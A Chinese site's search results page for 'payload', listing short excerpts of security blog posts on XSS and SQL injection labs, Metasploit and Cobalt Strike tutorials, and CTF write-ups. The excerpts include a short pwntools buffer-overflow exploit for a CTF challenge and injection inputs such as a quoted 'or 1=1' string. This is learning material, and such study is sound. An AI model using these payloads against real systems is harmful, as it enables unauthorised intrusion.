码迷,mamicode.com
首页 >  
搜索关键字:payload    ( 762个结果
如何深入理解 EKS IRSA 的实现机制
一、aws iam token 的生成 1.1 token 生成 我们这里使用的 AWS 完全管理的 K8s 集群 EKS,并且通过如下命令创建了 iamserviceaccount "[1]" 。 关于 IRSA 的一个架构图大致如下: 在由 API Server 创建一个 pod 后,由 Sel ...
分类:其他好文   时间:2020-01-02 18:26:44    阅读次数:98
Ethical Hacking - GAINING ACCESS(11)
CLIENT SIDE ATTACKS - Listening for connections 1. Run Metasploit Move the backdoor file to the webserver folder. And download it on the target machin ...
分类:数据库   时间:2020-01-01 09:34:15    阅读次数:76
XSS Challenge(1)
XSS Challenges http://xss-quiz.int21h.jp/ Stage #1 注入alert(document.domain),先试一试输入后会返回什么; 返回在标签中,直接尝试输入payload; Stage #2 测试一下返回; 可以发现,test返回在value属性里, ...
分类:其他好文   时间:2019-12-28 16:23:27    阅读次数:79
phpMyAdmin跳过登陆
本地总是需要登陆才行,嫌麻烦,就找了底层代码直接修改代码跳过登陆,修改方式如下:phpMyAdmin\libraries\classes\Plugins\Auth\AuthenticationCookie.php 文件 readCredentials() 方法添加了两段代码,下面截取部分代码,红色为 ...
分类:Web程序   时间:2019-12-27 13:23:29    阅读次数:97
Web实验 sql注入
数字型注入(POST): 数据库使用数字进行查询,尝试3 or 3来选择全部 字符型注入(GET): 通过字符进行查询,用kobe' or '1'='1尝试去掉查询字段两边的引号 发现可以注入 搜索型注入: 可能使用了like来确定查询范围 比如select 字段1,字段2 from 表名 wher... ...
分类:数据库   时间:2019-12-25 01:13:09    阅读次数:129
Web安全技术实验3
反射型XSS(get): 不会进行过滤。 前端对输入长度做了限制,我们需要修改一下才能输入完整的payload。 我们输入的payload嵌入了到了 p 标签里面,被浏览器正确执行了 反射型XSS(post): 参数内容不会出现在URL中 存储型xss: 不会进行过滤 输入 DOM型XSS: 查看源... ...
分类:Web程序   时间:2019-12-24 23:53:55    阅读次数:167
Cobaltstrike系列教程(二)-Listner与Payload生成 heatlevel
0x000-前文 Cobaltstrike系列教程(一)简介与安装 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。Listner(监听器):专门用于对其他对象身上发生的事件或状态改变进行监听和相应 ...
分类:其他好文   时间:2019-12-24 15:34:26    阅读次数:295
buuctf@pwn1_sctf_2016
from pwn import * sh=remote('pwn.buuoj.cn',20086) get_flag=0x08048F0D payload='I'*0x14+'a'*4+p32(get_flag) sh.sendline(payload) sh.interactive() ...
分类:其他好文   时间:2019-12-23 15:06:47    阅读次数:316
28.web8
file_get_contents()文件包含漏洞,根据题目提示txt?尝试flag.txt payload: ?ac=flags&fn=flag.txt ...
分类:Web程序   时间:2019-12-22 16:25:39    阅读次数:90
25.md5 collision(NUPT_CTF)
抓住两点提示: 1.md5碰撞 2.please input a 利用0 == 字符串是成立的,从而可以绕过MD5检查。 所以找一个md5是0e开头的值,因为 php 在处理 == 的时候当碰到的字符串有一边为 0e 开头的就把这串字符串认为是科学计数法, 所以就是 0 所以 payload: ?a ...
分类:其他好文   时间:2019-12-22 14:42:03    阅读次数:116
762条   上一页 1 ... 18 19 20 21 22 ... 77 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!